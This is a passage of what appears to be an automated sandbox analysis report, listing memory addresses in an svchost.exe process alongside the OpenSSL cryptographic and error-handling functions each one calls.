    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8359E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,55_2_00007FF8B8359E00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,55_2_00007FF8B833DE10
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8383E10 CRYPTO_malloc,CRYPTO_free,55_2_00007FF8B8383E10
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8385E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B8385E20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8331EC0 CRYPTO_free,55_2_00007FF8B8331EC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8387EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B8387EC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A5E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B83A5E80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8397E90 CRYPTO_malloc,COMP_expand_block,55_2_00007FF8B8397E90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,55_2_00007FF8B835DEA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833DF70 CRYPTO_malloc,BIO_snprintf,55_2_00007FF8B833DF70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8353F00 CRYPTO_free,CRYPTO_strdup,55_2_00007FF8B8353F00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A1F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83A1F30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8359F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,55_2_00007FF8B8359F30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B837FFD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8397FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B8397FE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833BFF0 CRYPTO_THREAD_run_once,55_2_00007FF8B833BFF0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8339F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,55_2_00007FF8B8339F90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BBFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,55_2_00007FF8B83BBFA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8365FA0 CRYPTO_realloc,55_2_00007FF8B8365FA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354060 CRYPTO_free,CRYPTO_memdup,55_2_00007FF8B8354060
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A0070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,55_2_00007FF8B83A0070
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8372000 CRYPTO_free,55_2_00007FF8B8372000
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8370010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,55_2_00007FF8B8370010
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,55_2_00007FF8B835A030
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837C0D0 CRYPTO_free,55_2_00007FF8B837C0D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83440E0 CRYPTO_get_ex_data,55_2_00007FF8B83440E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83640E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,55_2_00007FF8B83640E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83AB140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,55_2_00007FF8B83AB140
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835D140 CRYPTO_free,CRYPTO_malloc,55_2_00007FF8B835D140
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836D100 CRYPTO_free,55_2_00007FF8B836D100
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8381127 CRYPTO_realloc,55_2_00007FF8B8381127
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8349120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,55_2_00007FF8B8349120
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83851D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,55_2_00007FF8B83851D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83651E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,55_2_00007FF8B83651E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8385190 BIO_free,CRYPTO_free,55_2_00007FF8B8385190
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8335240 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B8335240
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8383200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,55_2_00007FF8B8383200
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8351210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,55_2_00007FF8B8351210
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,55_2_00007FF8B833321D
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8373220 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B8373220
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83532C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,55_2_00007FF8B83532C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836B2D0 CRYPTO_free,55_2_00007FF8B836B2D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83592F0 CRYPTO_realloc,memcpy,55_2_00007FF8B83592F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837F290 CRYPTO_realloc,55_2_00007FF8B837F290
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83B92A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B83B5360
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B833D360
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8347360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,55_2_00007FF8B8347360
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83AB370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,55_2_00007FF8B83AB370
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B835D310
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8383380 CRYPTO_free,55_2_00007FF8B8383380
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A93A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,55_2_00007FF8B83A93A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83313A0 CRYPTO_free,55_2_00007FF8B83313A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,55_2_00007FF8B835D440
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B420 CRYPTO_free,55_2_00007FF8B839B420
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A1430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,55_2_00007FF8B83A1430
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839D4E0 ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B839D4E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A74E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83A74E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83534E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,55_2_00007FF8B83534E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B4A0 CRYPTO_free,CRYPTO_free,55_2_00007FF8B839B4A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836B4B0 CRYPTO_zalloc,55_2_00007FF8B836B4B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8399540 OPENSSL_cleanse,CRYPTO_free,55_2_00007FF8B8399540
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83BB550
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8355550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,55_2_00007FF8B8355550
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8345500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,55_2_00007FF8B8345500
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833B500 CRYPTO_free,55_2_00007FF8B833B500
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83335C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,55_2_00007FF8B83335C8
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83315D0 CRYPTO_free,55_2_00007FF8B83315D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83875D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83875D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B5E0 CRYPTO_free,55_2_00007FF8B839B5E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,55_2_00007FF8B839D5F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836B5F0 CRYPTO_free,55_2_00007FF8B836B5F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B590 CRYPTO_free,55_2_00007FF8B839B590
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8339590 CRYPTO_free,CRYPTO_memdup,55_2_00007FF8B8339590
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83995A0 CRYPTO_free,55_2_00007FF8B83995A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83575B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,55_2_00007FF8B83575B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83B1650
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8353650 CRYPTO_THREAD_unlock,55_2_00007FF8B8353650
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8399620 CRYPTO_malloc,ERR_new,ERR_set_debug,55_2_00007FF8B8399620
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83336C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,55_2_00007FF8B83336C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83976D0 CRYPTO_free,55_2_00007FF8B83976D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83656D0 CRYPTO_zalloc,55_2_00007FF8B83656D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83836D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83836D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83AB6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,55_2_00007FF8B83AB6E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,55_2_00007FF8B834D68B
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A16B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B83A16B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8331740 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B8331740
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A5760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83A5760
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8343700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8343700
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8399730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B8399730
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8345780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,55_2_00007FF8B8345780
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8345840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,55_2_00007FF8B8345840
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8353840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8353840
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8339850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,55_2_00007FF8B8339850
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B83A985F
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B870 CRYPTO_free,55_2_00007FF8B839B870
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8337870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,55_2_00007FF8B8337870
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8343820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,55_2_00007FF8B8343820
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A38C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,55_2_00007FF8B83A38C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B8C0 CRYPTO_free,55_2_00007FF8B839B8C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83918D0 CRYPTO_free,55_2_00007FF8B83918D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83678D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83678D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B836B8D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83818E9 CRYPTO_malloc,CRYPTO_free,55_2_00007FF8B83818E9
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838A940 CRYPTO_zalloc,55_2_00007FF8B838A940
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8332940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,55_2_00007FF8B8332940
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,55_2_00007FF8B837E960
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,55_2_00007FF8B837A910
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A2930 CRYPTO_realloc,55_2_00007FF8B83A2930
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A49C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B83A49C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,55_2_00007FF8B834E9C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B69E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,55_2_00007FF8B83B69E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83449F0 CRYPTO_memdup,CRYPTO_free,55_2_00007FF8B83449F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,55_2_00007FF8B835C9A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8396A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B8396A60
